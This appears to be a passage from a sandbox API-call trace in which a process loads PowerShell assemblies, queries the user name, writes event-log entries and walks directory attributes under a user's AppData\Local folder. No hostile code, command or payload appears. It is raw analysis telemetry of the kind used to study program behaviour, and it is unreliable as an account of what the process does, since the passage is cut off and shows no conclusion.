returned 0xcb [0054.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.746] GetLastError () returned 0xcb [0054.746] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.803] GetLastError () returned 0xcb [0054.803] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.803] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x343ecc0*="Function", lpRawData=0x343eb7c) returned 1 [0054.803] GetLastError () returned 0x0 [0054.806] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.806] GetLastError () returned 0xcb [0054.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.810] GetLastError () returned 0xcb [0054.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.810] GetLastError () returned 0xcb [0054.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.810] GetLastError () returned 0xcb [0054.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.811] GetLastError () returned 0xcb [0054.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce4d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.843] GetLastError () returned 0xcb [0054.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.843] GetLastError () returned 0xcb [0054.843] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce488, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.843] GetLastError () returned 0xcb [0054.845] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.845] GetLastError () returned 0xcb [0054.845] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.846] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3457d7c*="Registry", lpRawData=0x3457c38) returned 1 [0054.846] GetLastError () returned 0x0 [0054.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce4c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.847] GetLastError () returned 0x0 [0054.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.847] GetLastError () returned 0x0 [0054.847] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.847] GetLastError () returned 0x0 [0054.848] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.848] GetLastError () returned 0x0 [0054.849] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.849] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x345bb64*="Variable", lpRawData=0x345ba20) returned 1 [0054.849] GetLastError () returned 0x0 [0054.850] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.850] GetLastError () returned 0xcb [0054.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.852] GetLastError () returned 0xcb [0054.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce4c4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.853] GetLastError () returned 0xcb [0054.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.853] GetLastError () returned 0xcb [0054.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.853] GetLastError () returned 0xcb [0054.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x2ce474, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0054.854] GetLastError () returned 0xcb [0054.945] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3b29f8, nSize=0x2ceac4 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x2ceac4) returned 0x1 [0054.945] GetLastError () returned 0x3 [0054.945] GetUserNameW (in: lpBuffer=0x3b8428, pcbBuffer=0x2ceacc | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x2ceacc) returned 1 [0054.945] ReportEventW (hEventLog=0x4ee0004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3469930*="Certificate", lpRawData=0x34697ec) returned 1 [0054.946] GetLastError () returned 0x0 [0054.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.957] GetLastError () returned 0xcb [0054.959] GetLogicalDrives () returned 0x4 [0054.959] GetLastError () returned 0xcb [0054.959] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2ce63c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.959] GetLastError () returned 0xcb [0054.959] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0054.959] GetLastError () returned 0xcb [0054.959] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3b8428 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc") returned 0x50 [0054.959] GetLastError () returned 0xcb [0054.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.961] GetLastError () returned 0xcb [0054.961] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.961] GetLastError () returned 0xcb [0054.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.976] GetLastError () returned 0xcb [0054.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.979] GetLastError () returned 0xcb [0054.979] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce484, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.979] GetLastError () returned 0xcb [0054.979] SetErrorMode (uMode=0x1) returned 0x1 [0054.980] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x3472c38 | out: lpFileInformation=0x3472c38*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.980] GetLastError () returned 0xcb [0054.980] SetErrorMode (uMode=0x1) returned 0x1 [0054.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce48c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.980] GetLastError () returned 0xcb [0054.980] SetErrorMode (uMode=0x1) returned 0x1 [0054.980] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc"), fInfoLevelId=0x0, lpFileInformation=0x3472e80 | out: lpFileInformation=0x3472e80*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x170fb110, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x190ab5f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x190ab5f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.980] GetLastError () returned 0xcb [0054.980] SetErrorMode (uMode=0x1) returned 0x1 [0054.984] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b8428, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.984] GetLastError () returned 0xcb [0054.989] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", nBufferLength=0x105, lpBuffer=0x2ce5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\4883c25a-c55c-46aa-a0b1-c2c0b01a64fc", lpFilePart=0x0) returned 0x50 [0054.989] GetLastError () returned 0xcb [0054.990] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.990] GetLastError () returned 0xcb [0054.990] SetErrorMode (uMode=0x1) returned 0x1 [0054.990] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.990] GetLastError () returned 0xcb [0054.990] SetErrorMode (uMode=0x1) returned 0x1 [0054.990] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.990] GetLastError () returned 0xcb [0054.990] SetErrorMode (uMode=0x1) returned 0x1 [0054.990] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x17fb5930, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x17fb5930, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.990] GetLastError () returned 0xcb [0054.990] SetErrorMode (uMode=0x1) returned 0x1 [0054.990] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x2ce564, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.990] GetLastError () returned 0xcb [0054.990] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2ce500, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0054.990] GetLastError () returned 0xcb [0054.990] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0054.990] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x2ce564, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0054.991] GetLastError () returned 0xcb [0054.991] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x2ce500, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8 [0054.991] GetLastError () returned 0xcb [0054.991] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.991] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0054.991] GetLastError () returned 0xcb [0054.991] SetErrorMode (uMode=0x1) returned 0x1 [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x2ce564, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0054.992] GetLastError () returned 0xcb [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\.", nBufferLength=0x105, lpBuffer=0x2ce500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0054.992] GetLastError () returned 0xcb [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0054.992] GetLastError () returned 0xcb [0054.992] SetErrorMode (uMode=0x1) returned 0x1 [0054.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0054.992] GetLastError () returned 0xcb [0054.992] SetErrorMode (uMode=0x1) returned 0x1 [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0054.992] GetLastError () returned 0xcb [0054.992] SetErrorMode (uMode=0x1) returned 0x1 [0054.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0054.992] GetLastError () returned 0xcb [0054.992] SetErrorMode (uMode=0x1) returned 0x1 [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", nBufferLength=0x105, lpBuffer=0x2ce564, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0054.992] GetLastError () returned 0xcb [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\.", nBufferLength=0x105, lpBuffer=0x2ce500, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFilePart=0x0) returned 0x25 [0054.992] GetLastError () returned 0xcb [0054.992] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0054.992] GetLastError () returned 0xcb [0054.992] SetErrorMode (uMode=0x1) returned 0x1 [0054.992] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19bf9e70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x19bf9e70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.992] GetLastError () returned 0xcb [0054.992] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x2ce550, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0054.993] GetLastError () returned 0xcb [0054.993] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local"), fInfoLevelId=0x0, lpFileInformation=0x2ce9d0 | out: lpFileInformation=0x2ce9d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x19bf9e70, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x19bf9e70, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0054.993] GetLastError () returned 0xcb [0054.993] SetErrorMode (uMode=0x1) returned 0x1 [0054.993] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x2ce564, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0054.993] 